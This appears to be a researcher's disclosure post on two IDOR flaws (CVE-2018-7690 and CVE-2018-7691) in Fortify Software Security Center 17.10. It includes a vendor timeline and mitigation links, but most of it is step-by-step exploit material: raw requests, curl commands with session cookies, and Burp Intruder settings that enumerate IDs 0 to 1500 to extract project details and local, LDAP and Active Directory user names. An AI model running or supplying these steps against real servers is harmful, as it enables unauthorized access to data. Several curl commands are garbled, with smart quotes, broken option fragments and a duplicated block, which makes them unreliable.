Hello everyone, we continue disclosure some CVEs/exploits (0days) with specific software/hardware products. Few months ago during my latest research, I found interesting security issues over Fortify Software, now IDOR attack vectors .

What is Fortify? is a secure product to perform source code audit/analysis based on “rulepacks” that could be integrated with other security tools as WebInspect (same vendor) or Jenkins, etc, product details here: https://marketplace.microfocus.com/fortify

CVE-2018–7690

Vulnerability

Fortify SSC (Software Security Center) 7.10, does not properly check ownership of projects, which allows remote authenticated (view-only) users

to read arbitrary details via API projects ID parameter to /api/v1/projects/{NUMBER}

Fortify Version Details here:

Fortify Software Security Center (SSC) Version 17.10

Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.

Fortify Software Security Center (SSC) Role Matrix

Proof of concept exploit:

Pre-requisites:

- curl command deployed (Windows or Linux)

- jq command deployed (for parsing JSON fields), (Windows or Linux)

- Burpsuite Free/Pro deployed or any other Proxy to catch/send the request (optional)

Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),

The URL normally is available as following:

Step (2): Once logged extract the Cookie field, the format normally as following:

“Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;”

Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default

Step (4): The offending GET below:

GET /ssc/api/v1/projects/2 HTTP/1.1

Host: fortifyserver.com

Connection: close

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;

Step (5): Test the first GET (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:

# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2 -H "Host: fortifyserver.com"

-H "Connection: close"

-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"

-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"

-H "Accept-Encoding: gzip, deflate"

-H "Accept-Language: en-US,en;q=0.9"

-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"

-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF"

--proxy http://127.0.0.1:8080 | jq '.data'

You should see the following response project details:

Using curl command to get project details (1)

Step (6): Now extract all the projects details registered into Fortify SSC server:

Payload: https://fortifyserver.com/ssc/api/v1/projects/{NUMBER} , and change the number as following:

# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5 -H "Host: fortifyserver.com"

-H "Connection: close"

-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"

-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"

-H "Accept-Encoding: gzip, deflate"

-H "Accept-Language: en-US,en;q=0.9"

-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"

-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF"

--proxy http://127.0.0.1:8080 | jq '.data'

You should see other projects details available as following:

Using curl command to get project details (2)

Step (7): Automate with BurpSuite Pro/Free choose:

Payload Positions: "Intruder Tab -> Positions” highlight as following: -> /ssc/api/v1/projects/§1§ Payloads set: “Intruder Tab -> Payloads” with the following data: -> Payload set: 1

-> Payload type: Numbers Payload Options [Numbers]: -> Type: Sequential

-> From: 0

-> To: 1500

-> Step: 1 Then start attack… Have fun!

Final IDOR extraction (project details)

Project details extraction using Burp Suite Professional

Timeline:

2018–05–24: Discovered

2018–05–25: Retest PRO environment

2018–05–31: Vendor notification, two issues found

2018–05–31: Vendor feedback received

2018–06–01: Internal communication

2018–06–01: Vendor feedback, two issues are confirmed

2018–06–05: Vendor notification, new issue found

2018–06–06: Vendor feedback, evaluating High submission

2018–06–08: Vendor feedback, High issue is confirmed

2018–06–19: Researcher, reminder sent

2018–06–22: Vendor feedback, summary of CVEs handled as official way

2018–06–26: Vendor feedback, official Hotfix for High issue available to test

2018–06–29: Researcher feedback

2018–07–02: Researcher feedback

2018–07–04: Researcher feedback, Hotfix tested on QA environment

2018–07–05: Vendor feedback, fixes scheduled Aug/Sep 2018

2018–08–02: Reminder to vendor, feedback received OK!

2018–09–26: Reminder to vendor, feedback received OK!

2018–09–26: Fixes received from the vendor

2018–10–02: Internal QA environment failed, re-building researcher ‘s ecosystem

2018–10–11: Internal QA environment failed, re-building researcher ‘s ecosystem

2018–10–11: Feedback from the vendor, technical details provided to the researcher

2018–10–16: Fixes now tested on QA environment

2018–11–08: Reminder received from the vendor, feedback provided by researcher

2018–11–09: Re-rest fixes on QA environment

2018–11–15: Re-rest fixes on QA environment now with SSC 18.20 version deployed

2018–11–21: Researcher feedback

2018–11–23: Fixes working well/confirmed by researcher

2018–11–23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.

2018–11–26: Vendor feedback, CVE, and official fixes to be disclosure

2018–11–26: Agreements with the vendor to publish the CVE/Advisory.

2018–11–27: Public report

Discovered by:

Alex Hernandez aka alt3kx:

================

Please visit https://github.com/alt3kx for more information.

My current exploit list @exploit-db:

https://www.exploit-db.com/author/?a=1074

https://www.exploit-db.com/author/?a=9576

Mitigations

=======

Provided by the vendor here:

Document ID: KM03298201

https://softwaresupport.softwaregrp.com/doc/KM03298201

CVE-2018–7691

Vulnerability



Fortify SSC (Software Security Center) 7.10, does not properly check ownership of “authEntities”, which allows remote authenticated (view-only) users to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities

Proof of Concept exploit:

Pre-requisites: idem

Step (1): idem

Step (2): Once logged extract the Cookie field, the format normally as following:

“Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;”

Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default

Step (4): The offending POST below:

POST /ssc/api/v1/bulk HTTP/1.1

Host: fortifyserver.com

Connection: close

Accept: application/json, text/plain, */*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36

Content-Type: application/json;charset=UTF-8

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;

Content-Length: 123 {“requests”:[{“uri”:”https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a

Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:

# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk

-H “Connection: close”

-H “Accept: application/json, text/plain, */*”

-H “X-Requested-With: XMLHttpRequest”

-H “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36”

-H “Content-Type: application/json;charset=UTF-8”

-H “Accept-Encoding: gzip, deflate”

-H “Accept-Language: en-US,en;q=0.9”

-H “Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;”

-b “JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;”

— data-binary “{\”requests\”:[{\”uri\”:\"

— proxy -H “Host: fortifyserver.com”-H “Connection: close”-H “Accept: application/json, text/plain, */*”-H “X-Requested-With: XMLHttpRequest”-H “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36”-H “Content-Type: application/json;charset=UTF-8”-H “Accept-Encoding: gzip, deflate”-H “Accept-Language: en-US,en;q=0.9”-H “Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;”-b “JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;”— data-binary “{\”requests\”:[{\”uri\”:\" https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\ ",\"httpVerb\":\"GET\"}]}\x0d\x0a"— proxy http://127.0.0.1:8080 | jq ‘.data[] .responses[] .body .responseCode’

You should see the following response: 200 OK!

Using curl command to get 200 OK! response

Step (6): Now extract all local and LDAP/Active Directory users registered into Fortify SSC server:

Payload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field “ — data-binary” below and change the number as following:

# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk -H “Host: fortifyserver.com”

-H “Connection: close”

-H “Accept: application/json, text/plain, */*”

-H “X-Requested-With: XMLHttpRequest”

-H “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36”

-H “Content-Type: application/json;charset=UTF-8”

-H “Accept-Encoding: gzip, deflate”

-H “Accept-Language: en-US,en;q=0.9”

-H “Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;”

-b “JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;”

— data-binary “{\”requests\”:[{\”uri\”:\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"

— proxy http://127.0.0.1:8080 | jq ‘.data[] .responses[] .body .data[] .entityName’

You should see the following response with users available:

“admin”

“sca”

“alex”

[../snip]

Using curl command to get Local/LDAP users

Step (7): Automate with BurpSuite Pro/Free choose:

Payload Positions: "Intruder Tab -> Positions” highlight as following: -> /api/v1/projectVersions/§1§/authEntities Payloads set: “Intruder Tab -> Payloads” with the following data: -> Payload set: 1

-> Payload type: Numbers Payload Options [Numbers]: -> Type: Sequential

-> From: 0

-> To: 1500

-> Step: 1 Then start attack… Have fun!

Final IDOR extraction (ldap/Active Directory/local users)

ldap/AD/local users extraction using Burp Suite Professional

Timeline:

2018–05–24: Discovered

2018–05–25: Retest PRO environment

2018–05–31: Vendor notification, two issues found

2018–05–31: Vendor feedback received

2018–06–01: Internal communication

2018–06–01: Vendor feedback, two issues are confirmed

2018–06–05: Vendor notification, new issue found

2018–06–06: Vendor feedback, evaluating High submission

2018–06–08: Vendor feedback, High issue is confirmed

2018–06–19: Researcher, reminder sent

2018–06–22: Vendor feedback, summary of CVEs handled as official way

2018–06–26: Vendor feedback, official Hotfix for High issue available to test

2018–06–29: Researcher feedback

2018–07–02: Researcher feedback

2018–07–04: Researcher feedback, Hotfix tested on QA environment

2018–07–05: Vendor feedback, fixes scheduled Aug/Sep 2018

2018–08–02: Reminder to vendor, feedback received OK!

2018–09–26: Reminder to vendor, feedback received OK!

2018–09–26: Fixes received from the vendor

2018–10–02: Internal QA environment failed, re-building researcher ‘s ecosystem

2018–10–11: Internal QA environment failed, re-building researcher ‘s ecosystem

2018–10–11: Feedback from the vendor, technical details provided to the researcher

2018–10–16: Fixes now tested on QA environment

2018–11–08: Reminder received from the vendor, feedback provided by researcher

2018–11–09: Re-rest fixes on QA environment

2018–11–15: Re-rest fixes on QA environment now with SSC 18.20 version deployed

2018–11–21: Researcher feedback

2018–11–23: Fixes working well/confirmed by researcher

2018–11–23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.

2018–11–26: Vendor feedback, CVE, and official fixes to be disclosure

2018–11–26: Agreements with the vendor to publish the CVE/Advisory.

2018–12–12: Public report

Discovered by:

Alex Hernandez aka alt3kx:

================

Please visit https://github.com/alt3kx for more information.

My current exploit list @exploit-db:

https://www.exploit-db.com/author/?a=1074

https://www.exploit-db.com/author/?a=9576

Mitigations

=======

Provided by the vendor here:

Document ID: KM03298201

https://softwaresupport.softwaregrp.com/doc/KM03298201